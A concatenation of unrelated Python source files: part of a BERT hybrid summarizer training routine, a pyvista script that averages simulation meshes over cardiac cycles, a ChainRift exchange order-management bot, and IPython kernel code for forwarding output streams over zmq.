else:
# print("~~~~~~~~~~~~~~~")
train_single_hybrid(args, device_id)
def train_single_hybrid(args, device_id):
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
# 重新设定随机种子
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
# 给attr加属性
setattr(args, k, opt[k])
else:
checkpoint = None
if args.train_from_extractor != '':
logger.info('Loading checkpoint from %s' % args.train_from_extractor)
checkpoint_ext = torch.load(args.train_from_extractor,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint_ext['opt'])
for k in opt.keys():
if (k in model_flags):
# 给attr加属性
setattr(args, k, opt[k])
else:
checkpoint_ext = None
if args.train_from_abstractor != '':
logger.info('Loading checkpoint from %s' % args.train_from_abstractor)
checkpoint_abs = torch.load(args.train_from_abstractor,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint_abs['opt'])
for k in opt.keys():
if (k in model_flags):
# 给attr加属性
setattr(args, k, opt[k])
else:
checkpoint_abs = None
def train_iter_fct():
# 读一次数据
if args.is_debugging:
print("YES it is debugging")
# 第三个参数是batch_size
return data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False), args.batch_size, device,
shuffle=False, is_test=False)
# exit()
else:
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
# modules, consts, options = init_modules()
# 选择模型: ExtSummarizer
# print("1~~~~~~~~~~~~~~~~~~~~")
model = HybridSummarizer(args, device, checkpoint, checkpoint_ext=checkpoint_ext, checkpoint_abs=checkpoint_abs)
# 建优化器
# print("2~~~~~~~~~~~~~~~~~~~~")
# optim = model_builder.build_optim(args, model, checkpoint)
if (args.sep_optim):
optim_bert = model_builder.build_optim_bert(args, model, checkpoint)
optim_dec = model_builder.build_optim_dec(args, model, checkpoint)
optim = [optim_bert, optim_dec]
# print("????????")
# print("optim")
# print(optim)
# exit()
else:
optim = [model_builder.build_optim(args, model, checkpoint)]
# 做log
logger.info(model)
# print("3~~~~~~~~~~~~~~~~~~~~")
# 建训练器
# tokenizer = BertTokenizer.from_pretrained('/home/ybai/projects/PreSumm/PreSumm/temp/', do_lower_case=True, cache_dir=args.temp_dir)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
train_loss = abs_loss(model.abstractor.generator, symbols, model.abstractor.vocab_size, device, train=True,
label_smoothing=args.label_smoothing)
trainer = build_trainer(args, device_id, model, optim, train_loss)
# print("4~~~~~~~~~~~~~~~~~~~~")
# 开始训练
trainer.train(train_iter_fct, args.train_steps)
|
run_temporal_averaging.py
|
import pyvista
import os, sys, glob
import subprocess
import math
from natsort import natsorted
import multiprocessing
def write_pvd(base_name, dt, nsteps, extension, nprocs_sim=1):
prefix = '''<?xml version="1.0"?>
<VTKFile type="Collection" version="0.1"
byte_order="LittleEndian"
compressor="vtkZLibDataCompressor">
<Collection>
'''
suffix = ''' </Collection>
</VTKFile>
'''
initialized = False
for n in range(nsteps):
for proc in range(nprocs_sim):
if not initialized:
filename_out = base_name + '.pvd'
print("filename_out = ", filename_out)
f_write = open(filename_out, 'w')
f_write.write(prefix)
initialized = True
tmp_str = ' <DataSet timestep="'
tmp_str += '{:.14f}'.format(dt * n)
tmp_str += '" group="" part="'
tmp_str += str(proc) + '"'
tmp_str += ' file="'
if nprocs_sim > 1:
tmp_str += base_name + str(n).zfill(4) + '/' # sorted into directories
tmp_str += base_name + str(n).zfill(4) + '.'
if nprocs_sim > 1:
tmp_str += str(proc) + '.'
tmp_str += extension
tmp_str += '"/>\n'
f_write.write(tmp_str)
f_write.write(suffix)
f_write.close()
def read_distributed_vtr(dir_name):
files = natsorted(glob.glob(dir_name + "/*.vtr"))
#print("files = ", files)
blocks = pyvista.MultiBlock([pyvista.read(f) for f in files])
return blocks.combine()
def average_eulerian_mesh_one_step(idx_mri_read, eulerian_var_names, times, cycle_duration, cycles_to_output, dt_mri_read, base_dir, base_name_out, extension):
# always start with initial eulerian mesh
dir_name = "eulerian_vars" + str(0).zfill(4)
mesh = read_distributed_vtr(dir_name)
n_to_average = 0
for var_name in eulerian_var_names:
mesh[var_name] *= 0.0
# average over times
for idx, t in enumerate(times):
# check if time in range
cycle_num = math.floor(t / cycle_duration)
# skip cycle one
if cycle_num in cycles_to_output:
dir_name = "eulerian_vars" + str(idx).zfill(4)
# time since start of this cycle
t_reduced = t % cycle_duration
idx_mri_read_temp = math.floor(t_reduced / dt_mri_read)
if idx_mri_read == idx_mri_read_temp:
print("processing step ", idx)
mesh_tmp = read_distributed_vtr(dir_name)
for var_name in eulerian_var_names:
mesh[var_name] += mesh_tmp[var_name]
n_to_average += 1.0
# print("t = ", t, "t_reduced = ", t_reduced, "idx_mri_read = ", idx_mri_read)
for var_name in eulerian_var_names:
# if none to average, mesh output as all zeros
if n_to_average != 0:
mesh[var_name] /= float(n_to_average)
fname = base_name_out + str(idx_mri_read).zfill(4) + '.' + extension
mesh.save(base_dir + "/" + fname)
if __name__ == '__main__':
if len(sys.argv) >= 2:
nprocs_sim = int(sys.argv[1]) # number of procs in the sim, which determines how many files go into the decomposed data
else:
print("using default nprocs_sim = 1")
nprocs_sim = 1
# first make sure there is a times file
if not os.path.isfile('times.txt'):
subprocess.call('visit -cli -nowin -s ~/copies_scripts/write_times_file_visit.py', shell=True)
times = []
times_file = open('times.txt', 'r')
for line in times_file:
times.append(float(line))
eulerian = True
lagrangian = True
first_cycle = True
second_cycle = False
if first_cycle:
cycles_to_output = [0] # zero indexed
# set up some directories
base_dir = "vis_data_averaged_cycle_1"
elif second_cycle:
cycles_to_output = [1] # zero indexed
# set up some directories
base_dir = "vis_data_averaged_cycle_2"
else:
cycles_to_output = [1,2,3] # zero indexed
# set up some directories
base_dir = "vis_data_averaged_cycle_2_3_4"
cycle_duration = 8.3250000000000002e-01
mri_read_times_per_cycle = 10
dt_mri_read = cycle_duration / mri_read_times_per_cycle
output_times_per_cycle = 20
dt_output = cycle_duration / output_times_per_cycle
if not os.path.exists(base_dir):
os.mkdir(base_dir)
if eulerian:
eulerian_var_names = ['P','Omega', 'U']
# output file extension
extension = 'vtu'
suffix = "_averaged"
base_name_out = "eulerian_vars_mri_freq"
# average all the Eulerian files here
# for idx_mri_read in range(mri_read_times_per_cycle):
# average_eulerian_mesh_one_step(idx_mri_read, eulerian_var_names, times, cycle_duration, cycles_to_output, dt_mri_read, base_dir, base_name_out, extension)
jobs = []
for idx_mri_read in range(mri_read_times_per_cycle):
p = multiprocessing.Process(target=average_eulerian_mesh_one_step, args=(idx_mri_read, eulerian_var_names, times, cycle_duration, cycles_to_output, dt_mri_read, base_dir, base_name_out, extension))
jobs.append(p)
p.start()
for p in jobs:
p.join()
# for idx_output in range(output_times_per_cycle):
# eulerian_dir_name = base_dir + '/' + 'eulerian_vars' + suffix + str(idx_output).zfill(4)
# if not os.path.exists(eulerian_dir_name):
# os.mkdir(eulerian_dir_name)
# only average cycle 2
# cycles_to_include = [2]
# loops over parallel data structure as outer loop
# for proc_num in range(nprocs_sim):
# read and zero meshes to use to accumulate from first mesh
dir_name = "eulerian_vars" + str(0).zfill(4)
# read all time zero meshes
# meshes_mri_read = []
# n_to_average = []
# for idx_mri_read in range(mri_read_times_per_cycle):
# meshes_mri_read.append(read_distributed_vtr(dir_name))
# n_to_average.append(0)
# for var_name in eulerian_var_names:
# meshes_mri_read[idx_mri_read][var_name] *= 0.0
meshes_mri_read = []
for idx_mri_read in range(mri_read_times_per_cycle):
fname = base_name_out + str(idx_mri_read).zfill(4) + '.' + extension
meshes_mri_read.append( pyvista.read(base_dir + "/" + fname) )
meshes_output = []
for idx_output in range(output_times_per_cycle):
meshes_output.append(read_distributed_vtr(dir_name))
for var_name in eulerian_var_names:
meshes_output[idx_output][var_name] *= 0.0
# # average over times
# for idx, t in enumerate(times):
# # check if time in range
# cycle_num = math.floor(t / cycle_duration)
# # skip cycle one
# if cycle_num in cycles_to_output:
# print("processing step ", idx)
# dir_name = "eulerian_vars" + str(idx).zfill(4)
# # time since start of this cycle
# t_reduced = t % cycle_duration
# idx_mri_read = math.floor(t_reduced / dt_mri_read)
# mesh_tmp = read_distributed_vtr(dir_name)
# for var_name in eulerian_var_names:
# meshes_mri_read[idx_mri_read][var_name] += mesh_tmp[var_name]
# n_to_average[idx_mri_read] += 1.0
# # print("t = ", t, "t_reduced = ", t_reduced, "idx_mri_read = ", idx_mri_read)
# print("n_to_average = ", n_to_average)
# # convert sums to averages
# for idx_mri_read in range(mri_read_times_per_cycle):
# for var_name in eulerian_var_names:
# meshes_mri_read[idx_mri_read][var_name] /= float(n_to_average[idx_mri_read])
# linearly interpolate before output
for idx_mri_read in range(mri_read_times_per_cycle):
for var_name in eulerian_var_names:
meshes_output[2*idx_mri_read][var_name] = meshes_mri_read[idx_mri_read][var_name]
for idx_mri_read in range(mri_read_times_per_cycle):
idx_mri_read_next = (idx_mri_read + 1) % mri_read_times_per_cycle
for var_name in eulerian_var_names:
meshes_output[2*idx_mri_read + 1][var_name] = 0.5 * (meshes_mri_read[idx_mri_read][var_name] + meshes_mri_read[idx_mri_read_next][var_name])
for idx_output in range(output_times_per_cycle):
eulerian_dir_name = base_dir
fname = "eulerian_vars" + suffix + str(idx_output).zfill(4) + '.' + extension
meshes_output[idx_output].save(eulerian_dir_name + "/" + fname)
# summary file
nprocs_output = 1
write_pvd("eulerian_vars" + suffix, dt_output, output_times_per_cycle, extension, nprocs_output)
os.rename("eulerian_vars" + suffix + '.pvd', base_dir + "/eulerian_vars" + suffix + '.pvd')
if lagrangian:
suffix = "_averaged"
for lag_file in os.listdir('..'):
if lag_file.endswith('.vertex'):
print("found lag file ", lag_file, ", processing ")
base_name_lag = lag_file.rsplit('.', 1)[0]
print("base_name_lag = ", base_name_lag)
# read and zero meshes to use to accumulate from first mesh
fname = base_name_lag + str(0).zfill(4) + '.vtu'
if not os.path.isfile(fname):
print("vtu file not found, cannot process this file, continuing")
continue
meshes_mri_read = []
n_to_average = []
for idx_mri_read in range(mri_read_times_per_cycle):
meshes_mri_read.append(pyvista.read(fname))
n_to_average.append(0)
meshes_mri_read[idx_mri_read].points *= 0.0
meshes_output = []
for idx_output in range(output_times_per_cycle):
meshes_output.append(pyvista.read(fname))
meshes_output[idx_output].points *= 0.0
# average over times
for idx, t in enumerate(times):
# check if time in range
cycle_num = math.floor(t / cycle_duration)
# skip cycle one
if cycle_num in cycles_to_output:
fname = base_name_lag + str(idx).zfill(4) + '.vtu'
# time since start of this cycle
t_reduced = t % cycle_duration
idx_mri_read = math.floor(t_reduced / dt_mri_read)
mesh_tmp = pyvista.read(fname)
meshes_mri_read[idx_mri_read].points += mesh_tmp.points
n_to_average[idx_mri_read] += 1.0
# print("t = ", t, "t_reduced = ", t_reduced, "idx_mri_read = ", idx_mri_read)
print("n_to_average = ", n_to_average)
# convert sums to averages
for idx_mri_read in range(mri_read_times_per_cycle):
meshes_mri_read[idx_mri_read].points /= float(n_to_average[idx_mri_read])
# linearly interpolate before output
for idx_mri_read in range(mri_read_times_per_cycle):
meshes_output[2*idx_mri_read].points = meshes_mri_read[idx_mri_read].points
for idx_mri_read in range(mri_read_times_per_cycle):
idx_mri_read_next = (idx_mri_read + 1) % mri_read_times_per_cycle
meshes_output[2*idx_mri_read + 1].points = 0.5 * (meshes_mri_read[idx_mri_read].points + meshes_mri_read[idx_mri_read_next].points)
for idx_output in range(output_times_per_cycle):
fname = base_name_lag + suffix + str(idx_output).zfill(4) + '.vtu'
meshes_output[idx_output].save(base_dir + "/" + fname)
# os.rename(fname, base_dir + "/" + base_name_lag + suffix + '.pvd')
# summary file
extension = 'vtu'
write_pvd(base_name_lag + suffix, dt_output, output_times_per_cycle, extension, 1)
os.rename(base_name_lag + suffix + '.pvd', base_dir + "/" + base_name_lag + suffix + '.pvd')
|
OrderLogic.py
|
from threading import Thread, Lock
from settings import Settings
from asyncblink import signal
from random import uniform
from helpers import Logger
curId = "OrderLogic"
class ChainRiftData(object):
balances = {}
openOrders = {}
for ticker, orderTypes in Settings.chainRiftPairPlacement.items():
for orderType in orderTypes:
openOrders[ticker + orderType] = {"sum": 0, "orders": {}}
@classmethod
def get_balance(cls, coin):
if coin in cls.balances:
return cls.balances[coin]
@classmethod
def set_balances(cls, data):
for balance in data:
cls.balances[balance["coin"]] = balance["quantity"]
@classmethod
def process_balance_changes(cls, data):
for change in data:
if change["coin"] in cls.balances:
cls.balances[change["coin"]] += change["quantity"]
@classmethod
def process_order_changes(cls, data):
for change in data:
orderKey = change["symbol"] + change["type"].lower()
try:
if change["action"] == "Add":
cls.openOrders[orderKey]["sum"] += change["leaveqty"]
cls.openOrders[orderKey]["orders"][change["orderid"]] = OrderItem(change)
elif change["action"] == "Update":
try:
tmp = cls.openOrders[orderKey]["orders"].pop(change["orderid"])
cls.openOrders[orderKey]["sum"] -= tmp.leaveQty
cls.openOrders[orderKey]["sum"] += change["leaveqty"]
cls.openOrders[orderKey]["orders"][change["orderid"]] = OrderItem(change)
except:
pass
elif change["action"] == "Remove":
try:
tmp = cls.openOrders[orderKey]["orders"].pop(change["orderid"])
cls.openOrders[orderKey]["sum"] -= tmp.leaveQty
except:
pass
except Exception as e:
Logger.info(curId, e, orderKey, cls.openOrders)
raise e
@classmethod
def get_open_orders(cls):
return cls.openOrders
class OrderActionsForPush(object):
def __init__(self):
self.init_storage()
self.lock = Lock()
def init_storage(self):
self.place = []
self.move = []
self.cancel = []
def place_order(self, pair, quantity, price, isbuy):
order = {
"symbol": pair,
"quantity": format(quantity, '.8f'),
"price": format(price, '.8f'),
"type": isbuy,
"tempid": uniform(0, 10000000000)
}
self.place.append(order)
if len(self.place) + 1 >= Settings.chainriftMaxOrdersInBulk:
raise MaxOrdersToPlaceException()
def move_order(self, orderid, price):
order = {
"id": orderid,
"price": format(price, '.8f'),
}
self.move.append(order)
if len(self.move) + 1 >= Settings.chainriftMaxOrdersInBulk:
raise MaxOrdersToMoveException()
def cancel_order(self, orderid):
self.cancel.append(orderid)
if len(self.cancel) + 1 >= Settings.chainriftMaxOrdersInBulk:
raise MaxOrdersToCancelException()
class OrderManagement(object):
processOrdersSignal = signal('processorders')
oafp = {}
for ticker, orderTypes in Settings.chainRiftPairPlacement.items():
for orderType in orderTypes:
oafp[ticker + orderType] = OrderActionsForPush()
@classmethod
async def process_orders(cls, data):
t = Thread(target=cls.process_orders2, args=(data,))
t.start()
@classmethod
def process_orders2(cls, data):
if data == "BalancesRetrieved":
for ticker in Settings.chainRiftPairPlacement.keys():
for isbuy in Settings.chainRiftPairPlacement[ticker]:
orderKey = ticker + isbuy
try:
cls.oafp[orderKey].lock.acquire()
cls.process_coinpair_orders(ticker, isbuy)
cls.process_oafp_leftovers(orderKey)
finally:
cls.oafp[orderKey].init_storage()
cls.oafp[orderKey].lock.release()
else:
ticker = data[0]
priceUpdate = data[2]
if priceUpdate != "lastPrice":
if ticker in Settings.chainRiftPairPlacement:
orderKey = ticker + priceUpdate
try:
cls.oafp[orderKey].lock.acquire()
cls.process_coinpair_orders(ticker, priceUpdate)
cls.process_oafp_leftovers(orderKey)
finally:
cls.oafp[orderKey].init_storage()
cls.oafp[orderKey].lock.release()
@classmethod
def process_oafp_leftovers(cls, orderKey):
# Process leftover orders that might have not been sent
if len(cls.oafp[orderKey].place) > 0:
cls.processOrdersSignal.send(("place", cls.oafp[orderKey].place))
if len(cls.oafp[orderKey].move) > 0:
cls.processOrdersSignal.send(("move", cls.oafp[orderKey].move))
if len(cls.oafp[orderKey].cancel) > 0:
cls.processOrdersSignal.send(("cancel", cls.oafp[orderKey].cancel))
@classmethod
def is_order_price_in_range(cls, order):
orderType = "buy" if order.isBuy else "sell"
curTicker = Settings.tickerPrices[order.symbol][orderType]
return curTicker * Settings.priceRanges[orderType][0] <= order.price <= curTicker * Settings.priceRanges[orderType][1]
@classmethod
def process_coinpair_orders(cls, ticker, isbuy):
# Maintain temporary cumulative for ticker/isbuy + currently cumulative already placed
tmp = 0
orderKey = ticker + isbuy
maxQuantity = Settings.chainRiftPairPlacement[ticker][isbuy]
# If price is 0 (default) do not place orders
if Settings.tickerPrices[ticker][isbuy] == 0:
return
# Move orders that need moving considering the range
for order in sorted(ChainRiftData.openOrders[orderKey]["orders"].values(),
key=lambda o: o.price, reverse=True if isbuy == "buy" else False):
isPriceInRange = cls.is_order_price_in_range(order)
if isPriceInRange:
continue
else:
price = Settings.tickerPrices[ticker][isbuy] * uniform(Settings.priceRanges[isbuy][0], Settings.priceRanges[isbuy][1])
try:
cls.oafp[orderKey].move_order(order.orderId, price)
except MaxOrdersToMoveException:
cls.processOrdersSignal.send(("move", cls.oafp[orderKey].move))
cls.oafp[orderKey].move = []
except Exception as e:
Logger.exception(curId, "Unexpected exception occurred while moving order", order.orderId, e)
# Place new orders
errorCounter = 0
while tmp + ChainRiftData.openOrders[orderKey]["sum"] < maxQuantity:
quantity = maxQuantity * 0.1 * uniform(0.3, 0.7)
price = Settings.tickerPrices[ticker][isbuy] * uniform(Settings.priceRanges[isbuy][0], Settings.priceRanges[isbuy][1])
try:
cls.oafp[orderKey].place_order(ticker, quantity, price, isbuy)
tmp += quantity
except MaxOrdersToPlaceException:
errorCounter += 1
cls.processOrdersSignal.send(("place", cls.oafp[orderKey].place))
cls.oafp[orderKey].place = []
except MaxOrdersToMoveException:
errorCounter += 1
cls.processOrdersSignal.send(("move", cls.oafp[orderKey].move))
cls.oafp[orderKey].move = []
except MaxOrdersToCancelException:
errorCounter += 1
cls.processOrdersSignal.send(("cancel", cls.oafp[orderKey].cancel))
cls.oafp[orderKey].cancel = []
except Exception as e:
errorCounter += 1
Logger.exception(curId, "Unexpected exception occurred while preparing orders", e)
if errorCounter >= 5:
Logger.info(curId, "An error occurred while preparing orders for", ticker)
break
processChangedOrdersSignal = signal('processchangedorders')
processChangedOrdersSignal.connect(ChainRiftData.process_order_changes)
processChangedBalancesSignal = signal('processchangedbalances')
processChangedBalancesSignal.connect(ChainRiftData.process_balance_changes)
class MaxOrdersToPlaceException(Exception):
pass
class MaxOrdersToMoveException(Exception):
pass
class MaxOrdersToCancelException(Exception):
pass
class OrderItem(object):
def __init__(self, jsonOrder):
self.orderId = jsonOrder["orderid"]
self.symbol = jsonOrder["symbol"]
self.leaveQty = jsonOrder["leaveqty"]
self.quantity = jsonOrder["quantity"]
self.price = jsonOrder["price"]
self.isBuy = True if jsonOrder["type"].lower() == "buy" else False
def __str__(self):
return "{" + ', '.join(['{key}: {value}'.format(key=key, value=self.__dict__.get(key)) for key in self.__dict__]) + "}"
def __repr__(self):
return self.__str__()
|
iostream.py
|
"""Wrappers for forwarding stdout/stderr over zmq"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import atexit
from binascii import b2a_hex
from collections import deque
from imp import lock_held as import_lock_held
import os
import sys
import threading
import warnings
from weakref import WeakSet
import traceback
from io import StringIO, TextIOBase
import io
import zmq
if zmq.pyzmq_version_info() >= (17, 0):
from tornado.ioloop import IOLoop
else:
# deprecated since pyzmq 17
from zmq.eventloop.ioloop import IOLoop
from zmq.eventloop.zmqstream import ZMQStream
from jupyter_client.session import extract_header
#-----------------------------------------------------------------------------
# Globals
#-----------------------------------------------------------------------------
MASTER = 0
CHILD = 1
#-----------------------------------------------------------------------------
# IO classes
#-----------------------------------------------------------------------------
class IOPubThread(object):
"""An object for sending IOPub messages in a background thread
Prevents a blocking main thread from delaying output from threads.
IOPubThread(pub_socket).background_socket is a Socket-API-providing object
whose IO is always run in a thread.
"""
def __init__(self, socket, pipe=False):
"""Create IOPub thread
Parameters
----------
socket : zmq.PUB Socket
the socket on which messages will be sent.
pipe : bool
Whether this process should listen for IOPub messages
piped from subprocesses.
"""
self.socket = socket
self.background_socket = BackgroundSocket(self)
self._master_pid = os.getpid()
self._pipe_flag = pipe
self.io_loop = IOLoop(make_current=False)
if pipe:
self._setup_pipe_in()
self._local = threading.local()
self._events = deque()
self._event_pipes = WeakSet()
self._setup_event_pipe()
self.thread = threading.Thread(target=self._thread_main)
self.thread.daemon = True
self.thread.pydev_do_not_trace = True
self.thread.is_pydev_daemon_thread = True
def _thread_main(self):
"""The inner loop that's actually run in a thread"""
self.io_loop.make_current()
self.io_loop.start()
self.io_loop.close(all_fds=True)
def _setup_event_pipe(self):
"""Create the PULL socket listening for events that should fire in this thread."""
ctx = self.socket.context
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
_uuid = b2a_hex(os.urandom(16)).decode('ascii')
iface = self._event_interface = 'inproc://%s' % _uuid
pipe_in.bind(iface)
self._event_puller = ZMQStream(pipe_in, self.io_loop)
self._event_puller.on_recv(self._handle_event)
@property
def _event_pipe(self):
"""thread-local event pipe for signaling events that should be processed in the thread"""
try:
event_pipe = self._local.event_pipe
except AttributeError:
# new thread, new event pipe
ctx = self.socket.context
event_pipe = ctx.socket(zmq.PUSH)
event_pipe.linger = 0
event_pipe.connect(self._event_interface)
self._local.event_pipe = event_pipe
# WeakSet so that event pipes will be closed by garbage collection
# when their threads are terminated
self._event_pipes.add(event_pipe)
return event_pipe
def _handle_event(self, msg):
"""Handle an event on the event pipe
Content of the message is ignored.
Whenever *an* event arrives on the event stream,
*all* waiting events are processed in order.
"""
# freeze event count so new writes don't extend the queue
# while we are processing
n_events = len(self._events)
for i in range(n_events):
event_f = self._events.popleft()
event_f()
def _setup_pipe_in(self):
"""setup listening pipe for IOPub from forked subprocesses"""
ctx = self.socket.context
# use UUID to authenticate pipe messages
self._pipe_uuid = os.urandom(16)
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
try:
self._pipe_port = pipe_in.bind_to_random_port("tcp://127.0.0.1")
except zmq.ZMQError as e:
warnings.warn("Couldn't bind IOPub Pipe to 127.0.0.1: %s" % e +
"\nsubprocess output will be unavailable."
)
self._pipe_flag = False
pipe_in.close()
return
self._pipe_in = ZMQStream(pipe_in, self.io_loop)
self._pipe_in.on_recv(self._handle_pipe_msg)
def _handle_pipe_msg(self, msg):
"""handle a pipe message from a subprocess"""
if not self._pipe_flag or not self._is_master_process():
return
if msg[0] != self._pipe_uuid:
print("Bad pipe message: %s", msg, file=sys.__stderr__)
return
self.send_multipart(msg[1:])
def _setup_pipe_out(self):
# must be new context after fork
ctx = zmq.Context()
pipe_out = ctx.socket(zmq.PUSH)
pipe_out.linger = 3000 # 3s timeout for pipe_out sends before discarding the message
pipe_out.connect("tcp://127.0.0.1:%i" % self._pipe_port)
return ctx, pipe_out
def _is_master_process(self):
return os.getpid() == self._master_pid
def _check_mp_mode(self):
"""check for forks, and switch to zmq pipeline if necessary"""
if not self._pipe_flag or self._is_master_process():
return MASTER
else:
return CHILD
def start(self):
"""Start the IOPub thread"""
self.thread.start()
# make sure we don't prevent process exit
# I'm not sure why setting daemon=True above isn't enough, but it doesn't appear to be.
atexit.register(self.stop)
def stop(self):
"""Stop the IOPub thread"""
if not self.thread.is_alive():
return
self.io_loop.add_callback(self.io_loop.stop)
self.thread.join()
# close *all* event pipes, created in any thread
# event pipes can only be used from other threads while self.thread.is_alive()
# so after thread.join, this should be safe
for event_pipe in self._event_pipes:
event_pipe.close()
def close(self):
if self.closed:
return
self.socket.close()
self.socket = None
@property
def closed(self):
return self.socket is None
def schedule(self, f):
"""Schedule a function to be called in our IO thread.
If the thread is not running, call immediately.
"""
if self.thread.is_alive():
self._events.append(f)
# wake event thread (message content is ignored)
self._event_pipe.send(b'')
else:
f()
def send_multipart(self, *args, **kwargs):
"""send_multipart schedules actual zmq send in my thread.
If my thread isn't running (e.g. forked process), send immediately.
"""
self.schedule(lambda : self._really_send(*args, **kwargs))
def _really_send(self, msg, *args, **kwargs):
"""The callback that actually sends messages"""
mp_mode = self._check_mp_mode()
if mp_mode != CHILD:
# we are master, do a regular send
self.socket.send_multipart(msg, *args, **kwargs)
else:
# we are a child, pipe to master
# new context/socket for every pipe-out
# since forks don't teardown politely, use ctx.term to ensure send has completed
ctx, pipe_out = self._setup_pipe_out()
pipe_out.send_multipart([self._pipe_uuid] + msg, *args, **kwargs)
pipe_out.close()
ctx.term()
class BackgroundSocket(object):
"""Wrapper around IOPub thread that provides zmq send[_multipart]"""
io_thread = None
def __init__(self, io_thread):
self.io_thread = io_thread
def __getattr__(self, attr):
"""Wrap socket attr access for backward-compatibility"""
if attr.startswith('__') and attr.endswith('__'):
# don't wrap magic methods
super(BackgroundSocket, self).__getattr__(attr)
if hasattr(self.io_thread.socket, attr):
warnings.warn("Accessing zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
return getattr(self.io_thread.socket, attr)
super(BackgroundSocket, self).__getattr__(attr)
def __setattr__(self, attr, value):
if attr == 'io_thread' or (attr.startswith('__' and attr.endswith('__'))):
super(BackgroundSocket, self).__setattr__(attr, value)
else:
warnings.warn("Setting zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
setattr(self.io_thread.socket, attr, value)
def send(self, msg, *args, **kwargs):
return self.send_multipart([msg], *args, **kwargs)
def send_multipart(self, *args, **kwargs):
"""Schedule send in IO thread"""
return self.io_thread.send_multipart(*args, **kwargs)
class OutStream(TextIOBase):
"""A file like object that publishes the stream to a 0MQ PUB socket.
Output is handed off to an IO Thread
"""
# timeout for flush to avoid infinite hang
# in case of misbehavior
flush_timeout = 10
# The time interval between automatic flushes, in seconds.
flush_interval = 0.2
topic = None
encoding = 'UTF-8'
def fileno(self):
"""
Things like subprocess will peak and write to the fileno() of stderr/stdout.
"""
if getattr(self, "_original_stdstream_copy", None) is not None:
return self._original_stdstream_copy
else:
raise io.UnsupportedOperation("fileno")
def _watch_pipe_fd(self):
"""
We've redirected standards steams 0 and 1 into a pipe.
We need to watch in a thread and redirect them to the right places.
1) the ZMQ channels to show in notebook interfaces,
2) the original stdout/err, to capture errors in terminals.
We cannot schedule this on the ioloop thread, as this might be blocking.
"""
try:
bts = os.read(self._fid, 1000)
while bts and self._should_watch:
self.write(bts.decode())
os.write(self._original_stdstream_copy, bts)
bts = os.read(self._fid, 1000)
except Exception:
self._exc = sys.exc_info()
def __init__(
self, session, pub_thread, name, pipe=None, echo=None, *, watchfd=True, isatty=False,
):
"""
Parameters
----------
name : str {'stderr', 'stdout'}
the name of the standard stream to replace
watchfd : bool (default, True)
Watch the file descripttor corresponding to the replaced stream.
This is useful if you know some underlying code will write directly
the file descriptor by its number. It will spawn a watching thread,
that will swap the give file descriptor for a pipe, read from the
pipe, and insert this into the current Stream.
isatty : bool (default, False)
Indication of whether this stream has termimal capabilities (e.g. can handle colors)
"""
if pipe is not None:
warnings.warn(
"pipe argument to OutStream is deprecated and ignored",
" since ipykernel 4.2.3.",
DeprecationWarning,
stacklevel=2,
)
# This is necessary for compatibility with Python built-in streams
self.session = session
if not isinstance(pub_thread, IOPubThread):
# Backward-compat: given socket, not thread. Wrap in a thread.
warnings.warn(
"Since IPykernel 4.3, OutStream should be created with "
"IOPubThread, not %r" % pub_thread,
DeprecationWarning,
stacklevel=2,
)
pub_thread = IOPubThread(pub_thread)
pub_thread.start()
self.pub_thread = pub_thread
self.name = name
self.topic = b"stream." + name.encode()
self.parent_header = {}
self._master_pid = os.getpid()
self._flush_pending = False
self._subprocess_flush_pending = False
self._io_loop = pub_thread.io_loop
self._new_buffer()
self.echo = None
self._isatty = bool(isatty)
if (
watchfd
and (sys.platform.startswith("linux") or sys.platform.startswith("darwin"))
and ("PYTEST_CURRENT_TEST" not in os.environ)
):
# Pytest set its own capture. Dont redirect from within pytest.
self._should_watch = True
self._setup_stream_redirects(name)
if echo:
if hasattr(echo, 'read') and hasattr(echo, 'write'):
self.echo = echo
else:
raise ValueError("echo argument must be a file like object")
def isatty(self):
"""Return a bool indicating whether this is an 'interactive' stream.
Returns:
Boolean
"""
return self._isatty
def _setup_stream_redirects(self, name):
pr, pw = os.pipe()
fno = getattr(sys, name).fileno()
self._original_stdstream_copy = os.dup(fno)
os.dup2(pw, fno)
self._fid = pr
self._exc = None
self.watch_fd_thread = threading.Thread(target=self._watch_pipe_fd)
self.watch_fd_thread.daemon = True
self.watch_fd_thread.start()
def _is_master_process(self):
return os.getpid() == self._master_pid
def set_parent(self, parent):
self.parent_header = extract_header(parent)
def close(self):
if sys.platform.startswith("linux") or sys.platform.startswith("darwin"):
self._should_watch = False
self.watch_fd_thread.join()
if self._exc:
etype, value, tb = self._exc
traceback.print_exception(etype, value, tb)
self.pub_thread = None
@property
def closed(self):
return self.pub_thread is None
def _schedule_flush(self):
"""schedule a flush in the IO thread
call this on write, to indicate that flush should be called soon.
"""
if self._flush_pending:
return
self._flush_pending = True
# add_timeout has to be handed to the io thread via event pipe
def _schedule_in_thread():
self._io_loop.call_later(self.flush_interval, self._flush)
self.pub_thread.schedule(_schedule_in_thread)
def flush(self):
"""trigger actual zmq send
send will happen in the background thread
"""
if self.pub_thread and self.pub_thread.thread is not None and self.pub_thread.thread.is_alive():
# request flush on the background thread
self.pub_thread.schedule(self._flush)
# wait for flush to actually get through, if we can.
